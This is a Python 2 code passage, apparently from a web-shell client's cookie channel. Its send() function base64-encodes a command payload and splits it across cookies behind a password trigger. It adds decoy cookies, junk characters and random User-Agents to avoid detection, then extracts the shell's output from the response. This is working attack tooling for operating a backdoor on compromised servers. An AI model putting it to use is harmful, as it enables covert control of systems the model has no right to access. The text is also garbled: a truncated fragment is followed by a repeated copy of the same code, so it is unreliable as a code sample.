    additional_ua = ''
    additional_cookie = ''
    for h in self.additional_headers:
        if h[0].lower() == 'cookie' and h[1]:
            additional_cookie = ' %s;' % h[1].strip(';')
        elif h[0].lower() == 'user-agent' and h[1]:
            additional_ua = h[1]
        else:
            additional_headers.append(h)

    additional_headers.append(
        ('User-Agent', (
            additional_ua
            if additional_ua
            else random.choice(self.agents)
        ))
    )

    # If user cookies are specified, insert them between the first
    # (the trigger) and the lastest three (the splitted payload)
    additional_headers.append(
        ('Cookie', '%s=%s;%s %s' % (
            prefixes.pop(),
            self.password[:2],
            additional_cookie if additional_cookie else '',
            cookie_payload_string
        ))
    )

    opener.addheaders = additional_headers

    dlog.debug(
        '[H]\n%s' % ('\n'.join(
            '> %s: %s' % (h[0], h[1]) for h in additional_headers))
    )

    url = (
        self.url
        if not config.add_random_param_nocache
        else utils.http.add_random_url_param(self.url)
    )

    response = opener.open(url).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()
def send(self, original_payload):
    """Send the payload split across cookies.

    The trigger cookie (two password-derived characters) comes first,
    followed by any user-configured cookies and the three
    payload-bearing cookies.

    Returns the first extracted chunk of the response, or None.
    """
    payload = base64.b64encode(original_payload.strip())
    length = len(payload)
    third = length / 3
    thirds = third * 2

    prefixes = self.default_prefixes[:]

    cookie_payload_string = ''

    # Add random cookies before payload, keeping four prefixes spare:
    # one for the trigger and three for the payload chunks.
    # (The original `> 3 and > 4` test was redundant: both must hold,
    # which is simply `> 4`.)
    while len(prefixes) > 4:
        if random.random() > 0.5:
            break
        cookie_payload_string += (
            prefixes.pop() + '=' +
            utils.strings.randstr(
                16, False, string.letters + string.digits) + '; '
        )

    # DO NOT fuzz with %, _ (\w on regexp keep _)
    payload = utils.strings.pollute(data=payload, charset='#&*-/?@~')

    cookie_payload_string += prefixes.pop() + '=' + payload[:third] + '; '
    cookie_payload_string += (
        prefixes.pop() + '=' + payload[third:thirds] + '; ')
    cookie_payload_string += prefixes.pop() + '=' + payload[thirds:]

    opener = urllib2.build_opener()

    # When core.conf contains additional cookies, carefully merge
    # the new cookies and UA and add all the other headers
    additional_headers = []
    additional_ua = ''
    additional_cookie = ''
    for h in self.additional_headers:
        if h[0].lower() == 'cookie' and h[1]:
            additional_cookie = ' %s;' % h[1].strip(';')
        elif h[0].lower() == 'user-agent' and h[1]:
            additional_ua = h[1]
        else:
            additional_headers.append(h)

    additional_headers.append(
        ('User-Agent', (
            additional_ua
            if additional_ua
            else random.choice(self.agents)
        ))
    )

    # If user cookies are specified, insert them between the first
    # (the trigger) and the lastest three (the splitted payload)
    additional_headers.append(
        ('Cookie', '%s=%s;%s %s' % (
            prefixes.pop(),
            self.password[:2],
            additional_cookie if additional_cookie else '',
            cookie_payload_string
        ))
    )

    opener.addheaders = additional_headers

    dlog.debug(
        '[H]\n%s' % ('\n'.join(
            '> %s: %s' % (h[0], h[1]) for h in additional_headers))
    )

    url = (
        self.url
        if not config.add_random_param_nocache
        else utils.http.add_random_url_param(self.url)
    )

    response = opener.open(url).read()
    if not response:
        return

    data = self.extractor.findall(response)
    if not data or len(data) < 1:
        return

    return data[0].strip()